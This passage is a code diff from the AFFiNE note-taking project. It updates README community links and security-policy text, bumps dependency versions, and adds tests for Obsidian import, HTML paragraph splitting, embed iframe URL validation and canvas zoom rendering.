| [Create a bug report](https://github.com/toeverything/AFFiNE/issues/new?assignees=&labels=bug%2Cproduct-review&template=BUG-REPORT.yml&title=TITLE) | [Submit a feature request](https://github.com/toeverything/AFFiNE/issues/new?assignees=&labels=feat%2Cproduct-review&template=FEATURE-REQUEST.yml&title=TITLE) | [Check GitHub Discussion](https://github.com/toeverything/AFFiNE/discussions) | [Visit the AFFiNE's Discord](https://affine.pro/redirect/discord) |
| Something isn't working as expected | An idea for a new feature, or improvements | Discuss and ask questions | A place to ask, learn and engage with others |
Calling all developers, testers, tech writers and more! Contributions of all types are more than welcome, you can read more in [docs/types-of-contributions.md](docs/types-of-contributions.md). If you are interested in contributing code, read our [docs/CONTRIBUTING.md](docs/CONTRIBUTING.md) and feel free to check out our GitHub issues to get stuck in to show us what youre made of.
@@ -101,11 +101,9 @@ Calling all developers, testers, tech writers and more! Contributions of all typ
For **bug reports**, **feature requests** and other **suggestions** you can also [create a new issue](https://github.com/toeverything/AFFiNE/issues/new/choose) and choose the most appropriate template for your feedback.
For **translation** and **language support** you can visit our [i18n General Space](https://community.affine.pro/c/i18n-general).
For **translation** and **language support** you can visit our [Discord](https://affine.pro/redirect/discord).
Looking for **other ways to contribute** and wondering where to start? Check out the [AFFiNE Ambassador program](https://community.affine.pro/c/start-here/affine-ambassador), we work closely with passionate community members and provide them with a wide range of support and resources.
If you have questions, you are welcome to contact us. One of the best places to get more info and learn more is in the [AFFiNE Community](https://community.affine.pro) where you can engage with other like-minded individuals.
If you have questions, you are welcome to contact us. One of the best places to get more info and learn more is in the [Discord](https://affine.pro/redirect/discord) where you can engage with other like-minded individuals.
## Templates
@@ -182,20 +180,16 @@ Begin with Docker to deploy your own feature-rich, unrestricted version of AFFiN
[![Run on ClawCloud](https://raw.githubusercontent.com/ClawCloud/Run-Template/refs/heads/main/Run-on-ClawCloud.svg)](https://template.run.claw.cloud/?openapp=system-fastdeploy%3FtemplateName%3Daffine)
## Hiring
Some amazing companies, including AFFiNE, are looking for developers! Are you interested in joining AFFiNE or its partners? Check out our [Discord channel](https://affine.pro/redirect/discord) for some of the latest jobs available.
## Feature Request
For feature requests, please see [community.affine.pro](https://community.affine.pro/c/feature-requests/).
For feature requests, please see [discussions](https://github.com/toeverything/AFFiNE/discussions/categories/ideas).
## Building
### Codespaces
From the GitHub repo main page, click the green "Code" button and select "Create codespace on master". This will open a new Codespace with the (supposedly auto-forked
AFFiNE repo cloned, built, and ready to go.
AFFiNE repo cloned, built, and ready to go).
### Local
+2
View File
@@ -23,4 +23,6 @@ We welcome you to provide us with bug reports via and email at [security@toevery
Since we are an open source project, we also welcome you to provide corresponding fix PRs, we will determine specific rewards based on the evaluation results.
Due to limited resources, we do not accept and will not review any AI-generated security reports.
If the vulnerability is caused by a library we depend on, we encourage you to submit a security report to the corresponding dependent library at the same time to benefit more users.
+4 -5
View File
@@ -78,8 +78,7 @@
"@blocksuite/global": "workspace:*",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@blocksuite/sync": "workspace:*",
"rxjs": "^7.8.2"
"@blocksuite/sync": "workspace:*"
},
"exports": {
".": "./src/index.ts",
@@ -296,10 +295,10 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1",
"version": "0.26.3",
"devDependencies": {
"@vanilla-extract/vite-plugin": "^5.0.0",
"msw": "^2.12.4",
"vitest": "^3.2.4"
"msw": "^2.13.2",
"vitest": "^4.1.8"
}
}
@@ -0,0 +1,94 @@
// Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html
exports[`snapshot to markdown > imports obsidian vault fixtures 1`] = `
{
"entry": {
"children": [
{
"children": [
{
"children": [
{
"delta": [
{
"insert": "Panel
Body line",
},
],
"flavour": "affine:paragraph",
"type": "text",
},
],
"emoji": "💡",
"flavour": "affine:callout",
},
{
"flavour": "affine:attachment",
"name": "archive.zip",
"style": "horizontalThin",
},
{
"delta": [
{
"footnote": {
"label": "1",
"reference": {
"title": "reference body",
"type": "url",
},
},
"insert": " ",
},
],
"flavour": "affine:paragraph",
"type": "text",
},
{
"flavour": "affine:divider",
},
{
"delta": [
{
"insert": "after note",
},
],
"flavour": "affine:paragraph",
"type": "text",
},
{
"delta": [
{
"insert": " ",
"reference": {
"page": "linked",
"type": "LinkedPage",
},
},
],
"flavour": "affine:paragraph",
"type": "text",
},
{
"delta": [
{
"insert": "Sources",
},
],
"flavour": "affine:paragraph",
"type": "h6",
},
{
"flavour": "affine:bookmark",
},
],
"flavour": "affine:note",
},
],
"flavour": "affine:page",
},
"titles": [
"entry",
"linked",
],
}
`;
@@ -0,0 +1,14 @@
> [!custom] Panel
> Body line
![[archive.zip]]
[^1]
---
after note
[[linked]]
[^1]: reference body
@@ -0,0 +1 @@
plain linked page
@@ -2101,6 +2101,157 @@ describe('html to snapshot', () => {
expect(nanoidReplacement(rawBlockSnapshot)).toEqual(blockSnapshot);
});
test('paragraph with br should split into multiple blocks', async () => {
const html = template(`<p>aaa<br>bbb<br>ccc</p>`);
const blockSnapshot: BlockSnapshot = {
type: 'block',
id: 'matchesReplaceMap[0]',
flavour: 'affine:note',
props: {
xywh: '[0,0,800,95]',
background: DefaultTheme.noteBackgrounColor,
index: 'a0',
hidden: false,
displayMode: NoteDisplayMode.DocAndEdgeless,
},
children: [
{
type: 'block',
id: 'matchesReplaceMap[1]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [{ insert: 'aaa' }],
},
},
children: [],
},
{
type: 'block',
id: 'matchesReplaceMap[2]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [{ insert: 'bbb' }],
},
},
children: [],
},
{
type: 'block',
id: 'matchesReplaceMap[3]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [{ insert: 'ccc' }],
},
},
children: [],
},
],
};
const htmlAdapter = new HtmlAdapter(createJob(), provider);
const rawBlockSnapshot = await htmlAdapter.toBlockSnapshot({
file: html,
});
expect(nanoidReplacement(rawBlockSnapshot)).toEqual(blockSnapshot);
});
test('paragraph with br should keep inline styles in each split line', async () => {
const html = template(
`<p><strong>aaa</strong><br><a href="https://www.google.com/">bbb</a><br><em>ccc</em></p>`
);
const blockSnapshot: BlockSnapshot = {
type: 'block',
id: 'matchesReplaceMap[0]',
flavour: 'affine:note',
props: {
xywh: '[0,0,800,95]',
background: DefaultTheme.noteBackgrounColor,
index: 'a0',
hidden: false,
displayMode: NoteDisplayMode.DocAndEdgeless,
},
children: [
{
type: 'block',
id: 'matchesReplaceMap[1]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [
{
insert: 'aaa',
attributes: {
bold: true,
},
},
],
},
},
children: [],
},
{
type: 'block',
id: 'matchesReplaceMap[2]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [
{
insert: 'bbb',
attributes: {
link: 'https://www.google.com/',
},
},
],
},
},
children: [],
},
{
type: 'block',
id: 'matchesReplaceMap[3]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [
{
insert: 'ccc',
attributes: {
italic: true,
},
},
],
},
},
children: [],
},
],
};
const htmlAdapter = new HtmlAdapter(createJob(), provider);
const rawBlockSnapshot = await htmlAdapter.toBlockSnapshot({
file: html,
});
expect(nanoidReplacement(rawBlockSnapshot)).toEqual(blockSnapshot);
});
test('nested list', async () => {
const html = template(`<ul><li>111<ul><li>222</li></ul></li></ul>`);
@@ -1,4 +1,10 @@
import { MarkdownTransformer } from '@blocksuite/affine/widgets/linked-doc';
import { readFileSync } from 'node:fs';
import { basename, resolve } from 'node:path';
import {
MarkdownTransformer,
ObsidianTransformer,
} from '@blocksuite/affine/widgets/linked-doc';
import {
DefaultTheme,
NoteDisplayMode,
@@ -8,13 +14,18 @@ import {
CalloutAdmonitionType,
CalloutExportStyle,
calloutMarkdownExportMiddleware,
docLinkBaseURLMiddleware,
embedSyncedDocMiddleware,
MarkdownAdapter,
titleMiddleware,
} from '@blocksuite/affine-shared/adapters';
import type { AffineTextAttributes } from '@blocksuite/affine-shared/types';
import type {
BlockSnapshot,
DeltaInsert,
DocSnapshot,
SliceSnapshot,
Store,
TransformerMiddleware,
} from '@blocksuite/store';
import { AssetsManager, MemoryBlobCRUD, Schema } from '@blocksuite/store';
@@ -29,6 +40,138 @@ import { testStoreExtensions } from '../utils/store.js';
const provider = getProvider();
function withRelativePath(file: File, relativePath: string): File {
Object.defineProperty(file, 'webkitRelativePath', {
value: relativePath,
writable: false,
});
return file;
}
function markdownFixture(relativePath: string): File {
return withRelativePath(
new File(
[
readFileSync(
resolve(import.meta.dirname, 'fixtures/obsidian', relativePath),
'utf8'
),
],
basename(relativePath),
{ type: 'text/markdown' }
),
`vault/${relativePath}`
);
}
function exportSnapshot(doc: Store): DocSnapshot {
const job = doc.getTransformer([
docLinkBaseURLMiddleware(doc.workspace.id),
titleMiddleware(doc.workspace.meta.docMetas),
]);
const snapshot = job.docToSnapshot(doc);
expect(snapshot).toBeTruthy();
return snapshot!;
}
function normalizeDeltaForSnapshot(
delta: DeltaInsert<AffineTextAttributes>[],
titleById: ReadonlyMap<string, string>
) {
return delta.map(item => {
const normalized: Record<string, unknown> = {
insert: item.insert,
};
if (item.attributes?.link) {
normalized.link = item.attributes.link;
}
if (item.attributes?.reference?.type === 'LinkedPage') {
normalized.reference = {
type: 'LinkedPage',
page: titleById.get(item.attributes.reference.pageId) ?? '<missing>',
...(item.attributes.reference.title
? { title: item.attributes.reference.title }
: {}),
};
}
if (item.attributes?.footnote) {
const reference = item.attributes.footnote.reference;
normalized.footnote = {
label: item.attributes.footnote.label,
reference:
reference.type === 'doc'
? {
type: 'doc',
page: reference.docId
? (titleById.get(reference.docId) ?? '<missing>')
: '<missing>',
}
: {
type: reference.type,
...(reference.title ? { title: reference.title } : {}),
...(reference.fileName ? { fileName: reference.fileName } : {}),
},
};
}
return normalized;
});
}
function simplifyBlockForSnapshot(
block: BlockSnapshot,
titleById: ReadonlyMap<string, string>
): Record<string, unknown> {
const simplified: Record<string, unknown> = {
flavour: block.flavour,
};
if (block.flavour === 'affine:paragraph' || block.flavour === 'affine:list') {
simplified.type = block.props.type;
const text = block.props.text as
| { delta?: DeltaInsert<AffineTextAttributes>[] }
| undefined;
simplified.delta = normalizeDeltaForSnapshot(text?.delta ?? [], titleById);
}
if (block.flavour === 'affine:callout') {
simplified.emoji = block.props.emoji;
}
if (block.flavour === 'affine:attachment') {
simplified.name = block.props.name;
simplified.style = block.props.style;
}
if (block.flavour === 'affine:image') {
simplified.sourceId = '<asset>';
}
const children = (block.children ?? [])
.filter(child => child.flavour !== 'affine:surface')
.map(child => simplifyBlockForSnapshot(child, titleById));
if (children.length) {
simplified.children = children;
}
return simplified;
}
function snapshotDocByTitle(
collection: TestWorkspace,
title: string,
titleById: ReadonlyMap<string, string>
) {
const meta = collection.meta.docMetas.find(meta => meta.title === title);
expect(meta).toBeTruthy();
const doc = collection.getDoc(meta!.id)?.getStore({ id: meta!.id });
expect(doc).toBeTruthy();
return simplifyBlockForSnapshot(exportSnapshot(doc!).blocks, titleById);
}
describe('snapshot to markdown', () => {
test('code', async () => {
const blockSnapshot: BlockSnapshot = {
@@ -127,6 +270,94 @@ Hello world
expect(meta?.tags).toEqual(['a', 'b']);
});
test('preserves list text inside blockquotes without list blocks', async () => {
const markdown = `> **Shopping List:**
> - Apples
> - Bananas
> - Oranges
`;
const mdAdapter = new MarkdownAdapter(createJob(), provider);
const snapshot = await mdAdapter.toDocSnapshot({
file: markdown,
assets: new AssetsManager({ blob: new MemoryBlobCRUD() }),
});
expect(simplifyBlockForSnapshot(snapshot.blocks, new Map())).toMatchObject({
children: [
{
flavour: 'affine:note',
children: [
{
flavour: 'affine:paragraph',
type: 'quote',
delta: [
{ insert: 'Shopping List:' },
{ insert: '\n' },
{ insert: '- ' },
{ insert: 'Apples' },
{ insert: '\n' },
{ insert: '- ' },
{ insert: 'Bananas' },
{ insert: '\n' },
{ insert: '- ' },
{ insert: 'Oranges' },
],
},
],
},
],
});
const exported = await mdAdapter.fromDocSnapshot({
snapshot,
assets: new AssetsManager({ blob: new MemoryBlobCRUD() }),
});
expect(exported.file).toContain('> **Shopping List:**');
expect(exported.file).toContain('> \\- Apples');
expect(exported.file).toContain('> \\- Bananas');
expect(exported.file).toContain('> \\- Oranges');
});
test('imports obsidian vault fixtures', async () => {
const schema = new Schema().register(AffineSchemas);
const collection = new TestWorkspace();
collection.storeExtensions = testStoreExtensions;
collection.meta.initialize();
const attachment = withRelativePath(
new File([new Uint8Array([80, 75, 3, 4])], 'archive.zip', {
type: 'application/zip',
}),
'vault/archive.zip'
);
const { docIds } = await ObsidianTransformer.importObsidianVault({
collection,
schema,
importedFiles: [
markdownFixture('entry.md'),
markdownFixture('linked.md'),
attachment,
],
extensions: testStoreExtensions,
});
expect(docIds).toHaveLength(2);
const titleById = new Map(
collection.meta.docMetas.map(meta => [
meta.id,
meta.title ?? '<untitled>',
])
);
expect({
titles: collection.meta.docMetas
.map(meta => meta.title)
.sort((a, b) => (a ?? '').localeCompare(b ?? '')),
entry: snapshotDocByTitle(collection, 'entry', titleById),
}).toMatchSnapshot();
});
test('paragraph', async () => {
const blockSnapshot: BlockSnapshot = {
type: 'block',
@@ -0,0 +1,92 @@
import { describe, expect, test } from 'vitest';
import { bilibiliConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/bilibili.js';
import { excalidrawConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/excalidraw.js';
import { genericConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/generic.js';
import { googleDocsConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/google-docs.js';
import { googleDriveConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/google-drive.js';
import { miroConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/miro.js';
import { spotifyConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/spotify.js';
describe('embed iframe provider config', () => {
test('validates final iframe URLs from oEmbed providers', () => {
expect(
spotifyConfig.validateIframeUrl?.(
'https://open.spotify.com/embed/track/0TK2YIli7K1leLovkQiNik'
)
).toBe(true);
expect(
spotifyConfig.validateIframeUrl?.(
'https://example.com/embed/track/0TK2YIli7K1leLovkQiNik'
)
).toBe(false);
});
test('validates provider-specific iframe URL shapes', () => {
expect(
googleDriveConfig.validateIframeUrl?.(
'https://drive.google.com/file/d/file-id/preview?usp=embed_googleplus'
)
).toBe(true);
expect(
googleDriveConfig.validateIframeUrl?.(
'https://drive.google.com/drive/folders/folder-id?usp=sharing'
)
).toBe(false);
expect(
bilibiliConfig.validateIframeUrl?.(
'https://player.bilibili.com/player.html?bvid=BV1xx411c7mD&autoplay=0'
)
).toBe(true);
expect(
bilibiliConfig.match(
'https://player.bilibili.com/player.html?aid=123&autoplay=0'
)
).toBe(true);
expect(
bilibiliConfig.buildOEmbedUrl(
'https://player.bilibili.com/video/BV1xx411c7mD'
)
).toBe(
'https://player.bilibili.com/player.html?bvid=BV1xx411c7mD&autoplay=0'
);
expect(
bilibiliConfig.validateIframeUrl?.(
'https://www.bilibili.com/video/BV1xx411c7mD'
)
).toBe(false);
expect(
googleDocsConfig.validateIframeUrl?.(
'https://docs.google.com/document/d/doc-id/edit?usp=sharing'
)
).toBe(true);
expect(
miroConfig.validateIframeUrl?.(
'https://miro.com/app/live-embed/board-id/'
)
).toBe(true);
expect(
excalidrawConfig.validateIframeUrl?.('https://excalidraw.com/#room-id')
).toBe(true);
});
test('generic iframe validation excludes affine and non-https URLs', () => {
expect(genericConfig.validateIframeUrl?.('https://example.com/embed')).toBe(
true
);
expect(genericConfig.validateIframeUrl?.('http://example.com/embed')).toBe(
false
);
expect(
genericConfig.validateIframeUrl?.('https://app.affine.pro/embed')
).toBe(false);
expect(genericConfig.validateIframeUrl?.('https://127.0.0.1/embed')).toBe(
false
);
expect(genericConfig.validateIframeUrl?.('https://localhost/embed')).toBe(
false
);
});
});
@@ -0,0 +1,770 @@
import { Bound } from '@blocksuite/global/gfx';
import { Viewport, viewportRuntimeConfig } from '@blocksuite/std/gfx';
import { afterEach, describe, expect, test, vi } from 'vitest';
import * as viewportModule from '../../../../../framework/std/src/gfx/viewport.js';
import * as viewportElementModule from '../../../../../framework/std/src/gfx/viewport-element.js';
import * as canvasRendererModule from '../../../../blocks/surface/src/renderer/canvas-renderer.js';
import {
paintPlaceholder,
syncCanvasSize,
} from '../../../../gfx/turbo-renderer/src/renderer-utils.js';
import type { ViewportLayoutTree } from '../../../../gfx/turbo-renderer/src/types.js';
const originalCaps = [...viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM];
const originalDevicePixelRatio = Object.getOwnPropertyDescriptor(
window,
'devicePixelRatio'
);
function setDevicePixelRatio(value: number) {
Object.defineProperty(window, 'devicePixelRatio', {
configurable: true,
value,
});
}
function createRect(width: number, height: number): DOMRect {
return {
width,
height,
left: 0,
top: 0,
right: width,
bottom: height,
x: 0,
y: 0,
toJSON: () => ({}),
} as DOMRect;
}
function createFakeBlockModel(
id: string,
x: number,
y: number,
w = 10,
h = 10
) {
return {
id,
elementBound: new Bound(x, y, w, h),
};
}
type PaintPlaceholderForTest = (
canvas: HTMLCanvasElement,
layout: ViewportLayoutTree,
viewport: {
zoom: number;
toViewCoord: (x: number, y: number) => [number, number];
}
) => void;
afterEach(() => {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [...originalCaps];
if (originalDevicePixelRatio) {
Object.defineProperty(window, 'devicePixelRatio', originalDevicePixelRatio);
}
vi.restoreAllMocks();
});
describe('edgeless canvas budget', () => {
test('requests canvas budget sync when zoom crosses an effective dpr bucket', () => {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [
[0.5, 1],
[0.8, 2],
];
expect(
'shouldSyncCanvasBudgetOnViewportUpdate' in canvasRendererModule
).toBe(true);
const shouldSyncCanvasBudgetOnViewportUpdate = (
canvasRendererModule as {
shouldSyncCanvasBudgetOnViewportUpdate: (
previousZoom: number,
nextZoom: number,
rawDpr?: number
) => boolean;
}
).shouldSyncCanvasBudgetOnViewportUpdate;
expect(shouldSyncCanvasBudgetOnViewportUpdate(0.95, 0.4, 2)).toBe(true);
expect(shouldSyncCanvasBudgetOnViewportUpdate(0.95, 0.75, 2)).toBe(false);
expect(shouldSyncCanvasBudgetOnViewportUpdate(0.45, 0.4, 2)).toBe(false);
expect(shouldSyncCanvasBudgetOnViewportUpdate(0.95, 0.4, 1)).toBe(false);
});
test('enables low-zoom survival mode only for active iOS gestures', () => {
expect('shouldUseLowZoomSurvivalMode' in canvasRendererModule).toBe(true);
const shouldUseLowZoomSurvivalMode = (
canvasRendererModule as {
shouldUseLowZoomSurvivalMode: (
isIOS: boolean,
zoom: number,
gestureActive: boolean
) => boolean;
}
).shouldUseLowZoomSurvivalMode;
expect(shouldUseLowZoomSurvivalMode(true, 0.4, true)).toBe(true);
expect(shouldUseLowZoomSurvivalMode(true, 0.6, true)).toBe(false);
expect(shouldUseLowZoomSurvivalMode(true, 0.4, false)).toBe(false);
expect(shouldUseLowZoomSurvivalMode(false, 0.4, true)).toBe(false);
});
test('does not enable canvas placeholders for low-zoom panning without zooming', () => {
expect('shouldRenderCanvasPlaceholders' in canvasRendererModule).toBe(true);
const shouldRenderCanvasPlaceholders = (
canvasRendererModule as {
shouldRenderCanvasPlaceholders: (params: {
isIOS: boolean;
zoom: number;
isPanning: boolean;
isZooming: boolean;
skipRefreshDuringGesture: boolean;
turboEnabled: boolean;
}) => boolean;
}
).shouldRenderCanvasPlaceholders;
expect(
shouldRenderCanvasPlaceholders({
isIOS: true,
zoom: 0.4,
isPanning: true,
isZooming: false,
skipRefreshDuringGesture: true,
turboEnabled: true,
})
).toBe(false);
expect(
shouldRenderCanvasPlaceholders({
isIOS: true,
zoom: 0.4,
isPanning: false,
isZooming: true,
skipRefreshDuringGesture: true,
turboEnabled: true,
})
).toBe(true);
});
test('shares one bypass decision for placeholder and render paths only during the low-zoom iOS landscape gesture or recovery window', () => {
expect('getStackingCanvasBypassState' in canvasRendererModule).toBe(true);
expect(
'shouldBypassStackingCanvasesDuringLowZoomGesture' in canvasRendererModule
).toBe(true);
const getStackingCanvasBypassState = (
canvasRendererModule as {
getStackingCanvasBypassState: (params: {
isIOS: boolean;
zoom: number;
gestureActive: boolean;
recoveryActive: boolean;
viewportWidth: number;
viewportHeight: number;
}) => boolean;
}
).getStackingCanvasBypassState;
const shouldBypassStackingCanvasesDuringLowZoomGesture = (
canvasRendererModule as {
shouldBypassStackingCanvasesDuringLowZoomGesture: (params: {
isIOS: boolean;
zoom: number;
gestureActive: boolean;
recoveryActive: boolean;
viewportWidth: number;
viewportHeight: number;
}) => boolean;
}
).shouldBypassStackingCanvasesDuringLowZoomGesture;
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.4,
gestureActive: true,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(true);
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.4,
gestureActive: false,
recoveryActive: true,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(true);
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.4,
gestureActive: false,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(false);
expect(
shouldBypassStackingCanvasesDuringLowZoomGesture({
isIOS: true,
zoom: 0.4,
gestureActive: false,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(false);
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.4,
gestureActive: true,
recoveryActive: false,
viewportWidth: 430,
viewportHeight: 932,
})
).toBe(false);
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.6,
gestureActive: true,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(false);
expect(
getStackingCanvasBypassState({
isIOS: false,
zoom: 0.4,
gestureActive: true,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(false);
});
test('gesture low-zoom landscape bypass detaches stacking canvases through the existing attachment path', () => {
expect(
'shouldBypassStackingCanvasesDuringLowZoomGesture' in canvasRendererModule
).toBe(true);
expect('getStackingCanvasAttachmentDiff' in canvasRendererModule).toBe(
true
);
const shouldBypassStackingCanvasesDuringLowZoomGesture = (
canvasRendererModule as {
shouldBypassStackingCanvasesDuringLowZoomGesture: (params: {
isIOS: boolean;
zoom: number;
gestureActive: boolean;
recoveryActive: boolean;
viewportWidth: number;
viewportHeight: number;
}) => boolean;
}
).shouldBypassStackingCanvasesDuringLowZoomGesture;
const getStackingCanvasAttachmentDiff = (
canvasRendererModule as {
getStackingCanvasAttachmentDiff: (params: {
canvases: HTMLCanvasElement[];
wasAttached: boolean;
shouldAttach: boolean;
}) => {
added: HTMLCanvasElement[];
removed: HTMLCanvasElement[];
};
}
).getStackingCanvasAttachmentDiff;
const canvases = [document.createElement('canvas')];
const shouldBypass = shouldBypassStackingCanvasesDuringLowZoomGesture({
isIOS: true,
zoom: 0.4,
gestureActive: true,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
});
expect(shouldBypass).toBe(true);
expect(
getStackingCanvasAttachmentDiff({
canvases,
wasAttached: true,
shouldAttach: !shouldBypass,
})
).toEqual({
added: [],
removed: canvases,
});
});
test('uses overscan for main-canvas fallback culling and render origin', () => {
expect('getMainCanvasFallbackBounds' in canvasRendererModule).toBe(true);
const getMainCanvasFallbackBounds = (
canvasRendererModule as {
getMainCanvasFallbackBounds: (params: {
viewportBounds: Bound;
overscanViewportBounds: Bound;
}) => {
cullBound: Bound;
renderBound: Bound;
};
}
).getMainCanvasFallbackBounds;
const viewportBounds = new Bound(100, 200, 300, 150);
const overscanViewportBounds = new Bound(40, 170, 420, 210);
expect(
getMainCanvasFallbackBounds({
viewportBounds,
overscanViewportBounds,
})
).toEqual({
cullBound: overscanViewportBounds,
renderBound: overscanViewportBounds,
});
});
test('lays out overscan canvases relative to the exact viewport', () => {
expect('getCanvasViewportLayout' in canvasRendererModule).toBe(true);
const getCanvasViewportLayout = (
canvasRendererModule as {
getCanvasViewportLayout: (params: {
bound: Bound;
viewportBounds: Bound;
zoom: number;
viewScale: number;
dpr: number;
}) => {
actualHeight: number;
actualWidth: number;
height: number;
transform: string;
width: number;
};
}
).getCanvasViewportLayout;
expect(
getCanvasViewportLayout({
bound: new Bound(40, 170, 420, 210),
viewportBounds: new Bound(100, 200, 300, 150),
zoom: 1,
viewScale: 1,
dpr: 2,
})
).toEqual({
actualHeight: 420,
actualWidth: 840,
height: 210,
transform: 'translate(-60px, -30px) scale(1)',
width: 420,
});
});
test('computes stacking canvas DOM attachment diffs when bypass toggles', () => {
expect('getStackingCanvasAttachmentDiff' in canvasRendererModule).toBe(
true
);
const getStackingCanvasAttachmentDiff = (
canvasRendererModule as {
getStackingCanvasAttachmentDiff: (params: {
canvases: HTMLCanvasElement[];
wasAttached: boolean;
shouldAttach: boolean;
}) => {
added: HTMLCanvasElement[];
removed: HTMLCanvasElement[];
};
}
).getStackingCanvasAttachmentDiff;
const canvasA = document.createElement('canvas');
const canvasB = document.createElement('canvas');
const canvases = [canvasA, canvasB];
expect(
getStackingCanvasAttachmentDiff({
canvases,
wasAttached: true,
shouldAttach: false,
})
).toEqual({
added: [],
removed: canvases,
});
expect(
getStackingCanvasAttachmentDiff({
canvases,
wasAttached: false,
shouldAttach: true,
})
).toEqual({
added: canvases,
removed: [],
});
expect(
getStackingCanvasAttachmentDiff({
canvases,
wasAttached: true,
shouldAttach: true,
})
).toEqual({
added: [],
removed: [],
});
});
test('emits a lightweight zoom signal during gesture-skipped zoom updates so canvas budgets can shrink', () => {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [
[0.5, 1],
[0.8, 2],
];
const viewport = new Viewport();
viewport.SKIP_REFRESH_DURING_GESTURE = true;
const viewportUpdated = vi.fn();
const zoomUpdates: Array<{ previousZoom: number; zoom: number }> = [];
let lastCanvasBudgetZoom = viewport.zoom;
let budgetSyncCount = 0;
viewport.viewportUpdated.subscribe(viewportUpdated);
expect('zoomUpdated' in viewport).toBe(true);
const zoomUpdated = (
viewport as unknown as {
zoomUpdated: {
subscribe: (
callback: (update: { previousZoom: number; zoom: number }) => void
) => void;
};
}
).zoomUpdated;
zoomUpdated.subscribe(update => {
zoomUpdates.push(update);
if (
(
canvasRendererModule as {
shouldSyncCanvasBudgetOnViewportUpdate: (
previousZoom: number,
nextZoom: number,
rawDpr?: number
) => boolean;
}
).shouldSyncCanvasBudgetOnViewportUpdate(
lastCanvasBudgetZoom,
update.zoom,
2
)
) {
budgetSyncCount += 1;
}
lastCanvasBudgetZoom = update.zoom;
});
viewport.panning$.next(true);
viewport.setZoom(0.4, { x: 0, y: 0 }, false, false, true);
expect(viewportUpdated).not.toHaveBeenCalled();
expect(zoomUpdates).toEqual([{ previousZoom: 1, zoom: 0.4 }]);
expect(budgetSyncCount).toBe(1);
viewport.dispose();
});
test('keeps programmatic setZoom on the normal viewport update path in skip mode', () => {
const viewport = new Viewport();
viewport.SKIP_REFRESH_DURING_GESTURE = true;
const viewportUpdated = vi.fn();
const zoomUpdated = vi.fn();
viewport.viewportUpdated.subscribe(viewportUpdated);
viewport.zoomUpdated.subscribe(zoomUpdated);
viewport.setZoom(0.4, { x: 0, y: 0 });
expect(viewportUpdated).toHaveBeenCalledTimes(1);
expect(zoomUpdated).toHaveBeenCalledWith({ previousZoom: 1, zoom: 0.4 });
expect(viewport.panning$.value).toBe(false);
expect(viewport.zooming$.value).toBe(false);
viewport.dispose();
});
test('enables low-zoom block survival only while the gesture is still active', () => {
expect('shouldUseLowZoomBlockSurvivalMode' in viewportElementModule).toBe(
true
);
const shouldUseLowZoomBlockSurvivalMode = (
viewportElementModule as {
shouldUseLowZoomBlockSurvivalMode: (params: {
zoom: number;
skipRefreshDuringGesture: boolean;
gestureActive: boolean;
}) => boolean;
}
).shouldUseLowZoomBlockSurvivalMode;
expect(
shouldUseLowZoomBlockSurvivalMode({
zoom: 0.4,
skipRefreshDuringGesture: true,
gestureActive: true,
})
).toBe(true);
expect(
shouldUseLowZoomBlockSurvivalMode({
zoom: 0.4,
skipRefreshDuringGesture: true,
gestureActive: false,
})
).toBe(false);
});
test('keeps selected and one nearby viewport block active during low-zoom gesture survival', () => {
expect('getLowZoomGestureActiveModels' in viewportElementModule).toBe(true);
const getLowZoomGestureActiveModels = (
viewportElementModule as {
getLowZoomGestureActiveModels: (params: {
selectedModels: Set<{ id: string; elementBound: Bound }>;
viewportModels: Set<{ id: string; elementBound: Bound }>;
viewportBounds: Bound;
nearbyActiveBlockLimit: number;
nearbyDistanceRatio: number;
}) => Set<{ id: string; elementBound: Bound }>;
}
).getLowZoomGestureActiveModels;
const selected = createFakeBlockModel('selected', 10, 10);
const nearby = createFakeBlockModel('nearby', 28, 12);
const far = createFakeBlockModel('far', 78, 78);
const activeModels = getLowZoomGestureActiveModels({
selectedModels: new Set([selected]),
viewportModels: new Set([selected, nearby, far]),
viewportBounds: new Bound(0, 0, 100, 100),
nearbyActiveBlockLimit: 1,
nearbyDistanceRatio: 0.35,
});
expect([...activeModels].map(model => model.id).sort()).toEqual([
'nearby',
'selected',
]);
});
test('falls back to the nearest viewport block when nothing is selected', () => {
expect('getLowZoomGestureActiveModels' in viewportElementModule).toBe(true);
const getLowZoomGestureActiveModels = (
viewportElementModule as {
getLowZoomGestureActiveModels: (params: {
